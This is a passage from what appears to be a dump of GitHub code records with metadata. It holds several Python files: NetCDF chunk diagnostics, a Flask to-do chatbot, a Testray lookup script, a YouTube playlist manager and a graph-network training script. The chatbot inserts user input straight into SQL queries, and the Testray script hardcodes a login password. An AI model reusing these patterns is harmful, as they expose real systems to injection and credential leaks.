aggregated_chunking_shapes:\n aggregated_chunking_shapes[variable] = {}\n # logger.info(\n # f\"Initial chunk sizes set for {variable} in {file_name}\"\n # )\n if chunking_shape not in aggregated_chunking_shapes[variable]:\n aggregated_chunking_shapes[variable][chunking_shape] = set()\n # logger.info(\n # f\"New chunking shape {chunking_shape} found for variable {variable} in {file_name}\"\n # )\n aggregated_chunking_shapes[variable][chunking_shape].add(file_name)\n\n except Exception as e:\n logger.error(f\"Error processing file: {e}\")\n\n return aggregated_chunking_shapes\n\n\n# app = typer.Typer(\n# cls=OrderCommands,\n# add_completion=True,\n# add_help_option=True,\n# rich_markup_mode=\"rich\",\n# help=f'Create kerchunk reference',\n# )\n\n\n# @app.command(\n# 'shapes',\n# no_args_is_help=True,\n# help='Diagnose chunking shapes along series of files in a format supported by Xarray',\n# rich_help_panel=rich_help_panel_diagnose,\n# )\ndef diagnose_chunking_shapes(\n source_directory: Annotated[Path, typer_argument_source_directory],\n pattern: Annotated[str, typer_option_filename_pattern] = \"*.nc\",\n variable_set: Annotated[XarrayVariableSet, typer.Option(help=\"Set of Xarray variables to diagnose\")] = XarrayVariableSet.all,\n csv: Annotated[Path, typer_option_csv] = None,\n verbose: Annotated[int, typer_option_verbose] = VERBOSE_LEVEL_DEFAULT,\n):\n \"\"\"Scan files in the source directory that match the pattern and diagnose the chunking shapes for each variable.\"\"\"\n source_directory = Path(source_directory)\n file_paths = list(source_directory.glob(pattern))\n mode = DisplayMode(verbose)\n with display_context[mode]:\n try:\n chunking_shapes = detect_chunking_shapes_parallel(\n file_paths=file_paths,\n variable_set=variable_set,\n )\n except TypeError as e:\n raise ValueError(\"Error occurred:\", e)\n print_chunk_shapes_table(chunking_shapes)#, highlight_variables) : Idea\n\n if csv:\n write_nested_dictionary_to_csv(\n nested_dictionary=chunking_shapes,\n output_filename=csv,\n )\n\n\n# @app.command(\n# 'common-shape',\n# no_args_is_help=True,\n# help='Determine common chunking shape in multiple NetCDF files',\n# rich_help_panel=rich_help_panel_diagnose,\n# )\ndef determine_common_chunking_layout(\n source_directory: Annotated[Path, typer_argument_source_directory],\n pattern: Annotated[str, typer_option_filename_pattern] = \"*.nc\",\n variable_set: Annotated[XarrayVariableSet, typer.Option(help=\"Set of Xarray variables to diagnose\")] = XarrayVariableSet.all,\n verbose: Annotated[int, typer_option_verbose] = VERBOSE_LEVEL_DEFAULT,\n):\n \"\"\"\n \"\"\"\n source_directory = Path(source_directory)\n if not source_directory.exists() or not any(source_directory.iterdir()):\n print(f\"[red]The directory [code]{source_directory}[/code] does not exist or is empty[/red].\")\n return\n file_paths = list(source_directory.glob(pattern))\n if not file_paths:\n print(f\"No files matching the pattern [code]{pattern}[/code] found in [code]{source_directory}[/code]!\")\n return\n\n mode = DisplayMode(verbose)\n with display_context[mode]:\n chunking_shapes = detect_chunking_shapes_parallel(\n file_paths=file_paths,\n variable_set=variable_set,\n )\n common_chunking_shapes = {}\n for variable, shapes in chunking_shapes.items():\n import numpy as np\n max_shape = np.array(next(iter(shapes)), dtype=int)\n for shape in shapes:\n current_shape = np.array(shape, dtype=int)\n max_shape = np.maximum(max_shape, current_shape)\n common_chunking_shapes[variable] = tuple(max_shape)\n\n print_common_chunk_layouts(common_chunking_shapes)\n return common_chunking_shapes\n", "repo_name": "NikosAlexandris/rekx", "sub_path": "rekx/diagnose.py", "file_name": "diagnose.py", "file_ext": "py", "file_size_in_byte": 13073, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pathlib.Path", "line_number": 43, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 45, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet", "line_number": 45, "usage_type": "name"}, {"api_name": "typer.Option", "line_number": 45, "usage_type": "call"}, {"api_name": "typing.Annotated", "line_number": 46, "usage_type": "name"}, {"api_name": "typer_parameters.typer_argument_longitude_in_degrees", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 47, "usage_type": "name"}, {"api_name": "typer_parameters.typer_argument_latitude_in_degrees", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 48, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 48, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_csv", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 49, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_verbose", "line_number": 49, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet.all", "line_number": 45, "usage_type": "attribute"}, {"api_name": "constants.VERBOSE_LEVEL_DEFAULT", "line_number": 49, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "netCDF4.Dataset", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.getsize", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.select_netcdf_variable_set_from_dataset", "line_number": 64, "usage_type": "call"}, {"api_name": "models.XarrayVariableSet", "line_number": 65, "usage_type": "argument"}, {"api_name": "models.select_netcdf_variable_set_from_dataset", "line_number": 67, "usage_type": "call"}, {"api_name": "models.XarrayVariableSet", "line_number": 68, "usage_type": "argument"}, {"api_name": "constants.NOT_AVAILABLE", "line_number": 78, "usage_type": "argument"}, {"api_name": "constants.NOT_AVAILABLE", "line_number": 79, "usage_type": "argument"}, {"api_name": "constants.NOT_AVAILABLE", "line_number": 80, "usage_type": "name"}, {"api_name": "constants.NOT_AVAILABLE", "line_number": 81, "usage_type": "argument"}, {"api_name": "constants.NOT_AVAILABLE", "line_number": 82, "usage_type": "name"}, {"api_name": "select.select_fast", "line_number": 86, "usage_type": "call"}, {"api_name": "constants.NOT_AVAILABLE", "line_number": 93, "usage_type": "name"}, {"api_name": "print.print_metadata_table", "line_number": 100, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 106, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 106, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet", "line_number": 108, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 109, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet.all", "line_number": 108, "usage_type": "attribute"}, {"api_name": "constants.VERBOSE_LEVEL_DEFAULT", "line_number": 110, "usage_type": "name"}, {"api_name": "concurrent.futures.ProcessPoolExecutor", "line_number": 115, "usage_type": "call"}, {"api_name": "concurrent.futures.as_completed", "line_number": 125, "usage_type": "call"}, {"api_name": "loguru.logger.error", "line_number": 131, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 131, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 138, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 138, "usage_type": "name"}, {"api_name": "typer_parameters.typer_argument_source_directory", "line_number": 138, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 139, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_filename_pattern", "line_number": 139, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 140, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet", "line_number": 140, "usage_type": "name"}, {"api_name": "typer.Option", "line_number": 140, "usage_type": "call"}, {"api_name": "typing.Annotated", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 141, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 142, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 142, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 143, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 143, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_csv", "line_number": 143, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 144, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_verbose", "line_number": 144, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet.all", "line_number": 140, "usage_type": "attribute"}, {"api_name": "constants.VERBOSE_LEVEL_DEFAULT", "line_number": 144, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 147, "usage_type": "call"}, {"api_name": "progress.DisplayMode", "line_number": 149, "usage_type": "call"}, {"api_name": "progress.display_context", "line_number": 150, "usage_type": "name"}, {"api_name": "print.print_metadata_series_table", "line_number": 161, "usage_type": "call"}, {"api_name": "print.print_metadata_series_long_table", "line_number": 167, "usage_type": "call"}, {"api_name": "csv.write_nested_dictionary_to_csv", "line_number": 173, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 180, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet", "line_number": 181, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet.all", "line_number": 181, "usage_type": "attribute"}, {"api_name": "xarray.open_dataset", "line_number": 185, "usage_type": "call"}, {"api_name": "models.select_xarray_variable_set_from_dataset", "line_number": 186, "usage_type": "call"}, {"api_name": "models.XarrayVariableSet", "line_number": 187, "usage_type": "argument"}, {"api_name": "typing.List", "line_number": 198, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 198, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet", "line_number": 199, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet.all", "line_number": 199, "usage_type": "attribute"}, {"api_name": "concurrent.futures.ProcessPoolExecutor", "line_number": 217, "usage_type": "call"}, {"api_name": "concurrent.futures.as_completed", "line_number": 223, "usage_type": "call"}, {"api_name": "loguru.logger.error", "line_number": 242, "usage_type": "call"}, {"api_name": "loguru.logger", "line_number": 242, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 263, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 263, "usage_type": "name"}, {"api_name": "typer_parameters.typer_argument_source_directory", "line_number": 263, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 264, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_filename_pattern", "line_number": 264, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 265, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet", "line_number": 265, "usage_type": "name"}, {"api_name": "typer.Option", "line_number": 265, "usage_type": "call"}, {"api_name": "typing.Annotated", "line_number": 266, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 266, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_csv", "line_number": 266, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 267, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_verbose", "line_number": 267, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet.all", "line_number": 265, "usage_type": "attribute"}, {"api_name": "constants.VERBOSE_LEVEL_DEFAULT", "line_number": 267, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 270, "usage_type": "call"}, {"api_name": "progress.DisplayMode", "line_number": 272, "usage_type": "call"}, {"api_name": "progress.display_context", "line_number": 273, "usage_type": "name"}, {"api_name": "print.print_chunk_shapes_table", "line_number": 281, "usage_type": "call"}, {"api_name": "csv.write_nested_dictionary_to_csv", "line_number": 284, "usage_type": "call"}, {"api_name": "typing.Annotated", "line_number": 297, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 297, "usage_type": "name"}, {"api_name": "typer_parameters.typer_argument_source_directory", "line_number": 297, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 298, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_filename_pattern", "line_number": 298, "usage_type": "name"}, {"api_name": "typing.Annotated", "line_number": 299, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet", "line_number": 299, "usage_type": "name"}, {"api_name": "typer.Option", "line_number": 299, "usage_type": "call"}, {"api_name": "typing.Annotated", "line_number": 300, "usage_type": "name"}, {"api_name": "typer_parameters.typer_option_verbose", "line_number": 300, "usage_type": "name"}, {"api_name": "models.XarrayVariableSet.all", "line_number": 299, "usage_type": "attribute"}, {"api_name": "constants.VERBOSE_LEVEL_DEFAULT", "line_number": 300, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 304, "usage_type": "call"}, {"api_name": "rich.print", "line_number": 306, "usage_type": "call"}, {"api_name": "rich.print", "line_number": 310, "usage_type": "call"}, {"api_name": "progress.DisplayMode", "line_number": 313, "usage_type": "call"}, {"api_name": "progress.display_context", "line_number": 314, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 325, "usage_type": "call"}, {"api_name": "print.print_common_chunk_layouts", "line_number": 328, "usage_type": "call"}]}
+{"seq_id": "13661507303", "text": "import json\nfrom flask import Flask, request, render_template, redirect, url_for, jsonify\nimport requests\nfrom flask_cors import CORS\nimport string\nimport sqlite3\nimport uuid\nimport time\nimport datetime\nimport re\n\n\napp = Flask(__name__)\nCORS(app)\n\n\nuser = {\n \"name\": None,\n \"is_todo\": False,\n 'askCreate': False,\n}\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\", user_name=user['name'])\n\n\ndef checkIfUserIsInDB(userName):\n connection = sqlite3.connect('botoBrain.db')\n curs = connection.cursor()\n curs.execute(f\"SELECT * FROM users WHERE name = '{userName}' LIMIT 1\")\n res = curs.fetchone()\n if res:\n user['id'] = res[0]\n return f\"Good to see you again, {res[1]}\"\n else:\n user['id'] = uuid.uuid1()\n curs.execute(\n f\"INSERT INTO users VALUES ('{user['id']}' , '{userName}' )\")\n connection.commit()\n return f\"Welcome {user['name']}\"\n\n\ndef createNewTask(user_message):\n connection = sqlite3.connect('botoBrain.db')\n task_id = uuid.uuid1()\n curs = connection.cursor()\n curs.execute(\n f\"INSERT INTO tasks VALUES ('{task_id}', '{user['id']}','{user_message}',0,{time.time()})\")\n connection.commit()\n\n\ndef readTodoList():\n connection = sqlite3.connect('botoBrain.db')\n curs = connection.cursor()\n curs.execute(\n f\"SELECT * FROM tasks WHERE user_id = '{user['id']}'\")\n user_tasks = curs.fetchall()\n new_res = ''\n for index, task in enumerate(user_tasks):\n if task[3] == 1:\n task_status = 'COMPLETED'\n else:\n task_status = 'INCOMPLETE'\n date = time.ctime(int(task[4]))\n date = str(date)\n new_res += f\"{index+1}: Created at {date}: {task[2]} status: {task_status} \"\n return new_res\n\n\ndef updateTodoList(user_message):\n taskNum = int(re.search(r'\\d+', user_message).group())\n\n connection = sqlite3.connect('botoBrain.db')\n curs = connection.cursor()\n curs.execute(\n f\"SELECT * FROM tasks WHERE user_id = '{user['id']}' LIMIT 1 OFFSET {taskNum-1}\")\n task = curs.fetchone()\n taskId = task[0]\n\n curs.execute(\n f\"UPDATE tasks SET status = 1 WHERE id = '{taskId}' \")\n connection.commit()\n\n\n@app.route('/todo/')\ndef todoFunc():\n\n user_message = request.args['message']\n\n if not user['name']:\n user['name'] = user_message\n return {\"message\": f\"{checkIfUserIsInDB(user['name'])}, what would you like to do? create a new task or view your to do list?\", \"anim\": \"inlove.gif\"}\n\n if \"create\" in user_message:\n user_message = user_message[7:]\n createNewTask(user_message)\n return {\"message\": \"Created\", \"anim\": \"inlove.gif\"}\n\n if 'read' in user_message:\n return {f\"message\": readTodoList(), \"anim\": \"inlove.gif\"}\n\n if 'update' in user_message:\n updateTodoList(user_message)\n return {\"message\": \"Updated\", \"anim\": \"ok.gif\"}\n\n return {\"message\": \"todooooo\", \"anim\": \"inlove.gif\"}\n\n\n@app.route(\"/message/\", methods=['GET'])\ndef get_message():\n user_message = request.args['message']\n if request.args.get('type'):\n Mtype = request.args['type']\n else:\n Mtype = 'from_external'\n\n if not user['name']:\n user['name'] = user_message\n return {\"message\": f\"Hi, {user['name']}\", \"anim\": \"inlove.gif\"}\n\n if Mtype == 'parrot':\n return {\"message\": user_message, \"anim\": \"dog.gif\"}\n\n if Mtype == 'broken':\n return {\"message\": \"I'm so broken! I'm so broken...\", \"anim\": \"heartbroke.gif\"}\n\n if Mtype == 'drunk':\n return {\"message\": drunk(), \"anim\": \"dancing.gif\"}\n\n if Mtype == 'trump':\n return {\"message\": trump(), \"anim\": \"giggling.gif\"}\n\n if Mtype == 'external-bot':\n return {\"message\": external_bot(user_message), \"anim\": \"excited.gif\"}\n\n if Mtype == 'from_external':\n return {\"message\": \"This is the bot police!! You are under arrest\"}\n\n else:\n return {\"message\": \"Hello world\", \"anim\": \"confused.gif\"}\n\n\ndef drunk():\n connection = sqlite3.connect('botoBrain.db')\n curs = connection.cursor()\n curs.execute(\"SELECT * FROM drunk ORDER BY RANDOM() LIMIT 1\")\n res = curs.fetchone()\n return res[1]\n\n\ndef trump():\n trumpQ = requests.get(\n 'https://api.whatdoestrumpthink.com/api/v1/quotes/random').json()\n return trumpQ['message']\n\n\ndef external_bot(user_message):\n req = requests.get(\n f\"https://morning-basin-34003.herokuapp.com/message/?message={user_message}\").json()\n return req['message']\n\n\nif __name__ == \"__main__\":\n app.run(host=\"localhost\", port=7000, debug=True)\n", "repo_name": "ZoZTravolta/BOTO20", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 4609, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 13, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 14, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 30, "usage_type": "call"}, {"api_name": "uuid.uuid1", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 46, "usage_type": "call"}, {"api_name": "uuid.uuid1", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 50, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 55, "usage_type": "call"}, {"api_name": "time.ctime", "line_number": 66, "usage_type": "call"}, {"api_name": "re.search", "line_number": 73, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 113, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 113, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 114, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 114, "usage_type": "name"}, {"api_name": "flask.request.args", "line_number": 115, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 115, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 146, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 154, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 160, "usage_type": "call"}]}
+{"seq_id": "18949436590", "text": "#!/usr/bin/python\n\n\n# Script to get from a Github PR to Testray results\n# \n# Requires \"requests\" module (pip install requests)\n#\n# Run with ./testrayPR.py {GITHUB_PR_URL}\n\nimport json\nimport re\nimport requests\nimport sys\n\ndef getTestrayLinks(url):\n login = (\"sir.testalot@liferay.com\", \"TestyourmighT\")\n\n routineIds = [84095177, 84095178, 38582544, 38602290, 439299171, 439299172, 849929038, 849929056]\n\n url_stripped = re.sub(\"<[^<]+?>\", \"\", url)\n\n pull = url_stripped.split(\"#\")[0]\n number = pull.split(\"/\")[-1]\n\n links = {}\n\n for rout in routineIds:\n parameters = {\"testrayRoutineId\": rout, \"delta\": 200}\n\n result = requests.get(\n \"https://testray.liferay.com/home/-/testray/builds.json\",\n auth=login,\n params=parameters)\n\n for r in result.json()[\"data\"]:\n if \"PR#%s \" % (number) in r[\"name\"]:\n links[r[\"name\"]] = r[\"htmlURL\"]\n\n return links\n\ndef displayTestrayLinks(link):\n try:\n tr = getTestrayLinks(link)\n\n if tr:\n tr_message = \"Testray results for this PR:\\n\\n\" \\\n + \"\\n\\n\".join([\"%s\\n%s\" % (k, v)\n for k, v in tr.items()])\n return tr_message\n \n except Exception as e:\n print(e)\n\nif __name__ == \"__main__\":\n try:\n link = sys.argv[1]\n except:\n print(\"Please provide a github pull request URL\")\n exit()\n\n result = displayTestrayLinks(link)\n\n if result:\n print(\"\\n\" + result)\n else:\n print(\"Could not find any testray links for that URL\")\n", "repo_name": "mtambara/devscripts", "sub_path": "testray.py", "file_name": "testray.py", "file_ext": "py", "file_size_in_byte": 1602, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "re.sub", "line_number": 20, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 30, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 56, "usage_type": "attribute"}]}
+{"seq_id": "28758107496", "text": "from __future__ import unicode_literals\nfrom ytmanager import YtManager\nfrom dbmanager import DbManager\nimport time\nimport json\nfrom pathlib import Path\nclass YtPlaylistMan(): \n\n def __init__(self):\n # load config\n path = Path(__file__).parent.absolute()\n configpath = '{}/config.json'.format(path)\n with open(configpath) as file:\n config = json.load(file)\n \n #param\n self.playlist_url = config['playlist-url']\n self.current_download_url_id = \"\"\n self.current_download_url = \"\"\n # self.dbmanager = DbManager()\n\n def run(self):\n # get url\n print('fetching playlist...')\n url_list = YtManager(self).getUrlBasename(self.playlist_url)\n time.sleep(1)\n print('Inserting playlist item to database...')\n DbManager().insertListToDB(url_list)\n\n\n list_for_download = DbManager().getListUndownloadFromDB()\n if list_for_download :\n print('queue for downloading found')\n for item in list_for_download:\n url = 'https://www.youtube.com/watch?v={}'.format(item[\"url_id\"])\n self.current_download_url_id = item[\"url_id\"]\n self.current_download_url = url\n print('Trying to download file...')\n time.sleep(1)\n try:\n YtManager(url).download()\n DbManager().updateDownloadedToDB(item[\"url_id\"])\n except:\n print('failed to download')\n else:\n print('no download queue')\n \n\n\nYtPlaylistMan = YtPlaylistMan()\nYtPlaylistMan.run()", "repo_name": "akzn/youtube-playlist-manager", "sub_path": "index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 1657, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pathlib.Path", "line_number": 11, "usage_type": "call"}, {"api_name": "json.load", "line_number": 14, "usage_type": "call"}, {"api_name": "ytmanager.YtManager", "line_number": 25, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "dbmanager.DbManager", "line_number": 28, "usage_type": "call"}, {"api_name": "dbmanager.DbManager", "line_number": 31, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "ytmanager.YtManager", "line_number": 41, "usage_type": "call"}, {"api_name": "dbmanager.DbManager", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "24117356991", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\nbeeman_values = [4.484448e-05, 2.880218e-07, 2.750178e-09, 2.737481e-11]\nverlet_values = [5.725727e-04, 4.898959e-06, 4.821672e-08, 4.813985e-10]\ngear_values = [4.048045e-12, 2.999216e-22, 1.436273e-24, 5.572282e-23]\n\nfig = plt.figure()\n#ax = fig.add_subplot(2,1,1)\nprecisions = [\"10^-2\", \"10^-3\", \"10^-4\", \"10^-5\"]\nplt.plot(precisions, beeman_values, label=\"beeman\", linestyle=\"solid\", color=\"k\")\nplt.plot(precisions, verlet_values, label=\"verlet\", linestyle=\"solid\", color=\"r\")\nplt.plot(precisions, gear_values, label=\"gear\", linestyle=\"solid\", color=\"m\")\n#ax.set_yscale('log')\nplt.yscale(\"log\")\nplt.xlabel(\"Paso temporal Δt (s)\")\nplt.legend( loc='upper right')\nplt.ylabel(\"Error Cuadrático Medio\")\nplt.grid(visible=True)\nplt.show()", "repo_name": "ManuelDizen/SimSistemas", "sub_path": "TP4/src/graphs/oscilators2.py", "file_name": "oscilators2.py", "file_ext": "py", "file_size_in_byte": 800, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 9, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yscale", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 21, "usage_type": "name"}]}
+{"seq_id": "28371696898", "text": "from __future__ import print_function\nfrom __future__ import division\nimport numpy as np\nimport torch\nimport math\nfrom torch.nn.parameter import Parameter\nfrom torch.nn.modules.module import Module\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport time\nimport torch.optim as optim\nimport matplotlib.pyplot as plt\nfrom tqdm.notebook import tnrange\nimport pandas as pd\nfrom scipy.sparse import csr_matrix\nfrom scipy.sparse import coo_matrix\nfrom scipy.sparse import diags\nfrom scipy.sparse import eye\nfrom pathlib import Path\nfrom functools import partial\n\nimport sys\nimport json\nimport os\nimport src.models.graph_classification.test_model as test_model\n\ndef main(targets):\n if 'test' in targets:\n with open('config/test_param.json') as fh:\n test_params = json.load(fh)\n\n # run test on cora dataset using GCN\n device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n path = Path(test_params.get('data_path'))\n paper_features_label = np.genfromtxt(path/'cora.content', dtype=np.str)\n\n features = csr_matrix(paper_features_label[:, 1:-1], dtype=np.float32)\n labels = paper_features_label[:, -1]\n lbl2idx = {k:v for v,k in enumerate(sorted(np.unique(labels)))}\n labels = [lbl2idx[e] for e in labels]\n\n papers = paper_features_label[:,0].astype(np.int32)\n\n paper2idx = {k:v for v,k in enumerate(papers)}\n edges = np.genfromtxt(path/'cora.cites', dtype=np.int32)\n edges = np.asarray([paper2idx[e] for e in edges.flatten()], np.int32).reshape(edges.shape)\n\n adj = coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),\n shape=(len(labels), len(labels)), dtype=np.float32)\n\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n adj = test_model.normalize(adj + eye(adj.shape[0]))\n\n adj = torch.FloatTensor(adj.todense())\n features = torch.FloatTensor(features.todense())\n labels = torch.LongTensor(labels)\n\n np.random.seed(42)\n n_train = 200\n n_val = 300\n n_test = len(features) - n_train - n_val\n idxs = np.random.permutation(len(features))\n idx_train = torch.LongTensor(idxs[:n_train])\n idx_val = torch.LongTensor(idxs[n_train:n_train+n_val])\n idx_test = torch.LongTensor(idxs[n_train+n_val:])\n \n adj = adj.to(device)\n features = features.to(device)\n labels = labels.to(device)\n idx_train = idx_train.to(device)\n idx_val = idx_val.to(device)\n idx_test = idx_test.to(device)\n\n n_labels = labels.max().item() + 1\n n_features = features.shape[1]\n\n torch.manual_seed(34)\n\n model = test_model.GCN(nfeat=n_features,\n nhid=20, #hidden = 16\n nclass=n_labels,\n dropout=0.5) #dropout = 0.5\n\n model = model.to(device)\n optimizer = optim.Adam(model.parameters(),\n lr=0.001, weight_decay=5e-4)\n\n\n def accuracy(output, labels):\n preds = output.max(1)[1].type_as(labels)\n correct = preds.eq(labels).double()\n correct = correct.sum()\n return correct / len(labels)\n\n def step():\n t = time.time()\n model.train()\n optimizer.zero_grad()\n output = model(features, adj)\n loss = F.nll_loss(output[idx_train], labels[idx_train])\n acc = accuracy(output[idx_train], labels[idx_train])\n loss.backward()\n optimizer.step()\n \n return loss.item(), acc\n\n def evaluate(idx):\n model.eval()\n output = model(features, adj)\n loss = F.nll_loss(output[idx], labels[idx])\n acc = accuracy(output[idx], labels[idx])\n \n return loss.item(), acc\n\n epochs = 1000\n print_steps = 100\n train_loss, train_acc = [], []\n val_loss, val_acc = [], []\n\n for i in tnrange(epochs):\n tl, ta = step()\n train_loss += [tl]\n train_acc += [ta]\n \n if((i+1)%print_steps) == 0 or i == 0:\n tl, ta = evaluate(idx_train)\n vl, va = evaluate(idx_val)\n val_loss += [vl]\n val_acc += [va]\n \n print('Epochs: {}, Train Loss: {:.3f}, Train Acc: {:.3f}, Validation Loss: {:.3f}, Validation Acc: {:.3f}'.format(i, tl, ta, vl, va))\n\n print('Test passed!')\n\nif __name__ == '__main__':\n targets = sys.argv[1:]\n main(targets)", "repo_name": "DylanTao/UCSD_DSC180A_GNN", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 4631, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "json.load", "line_number": 30, "usage_type": "call"}, {"api_name": 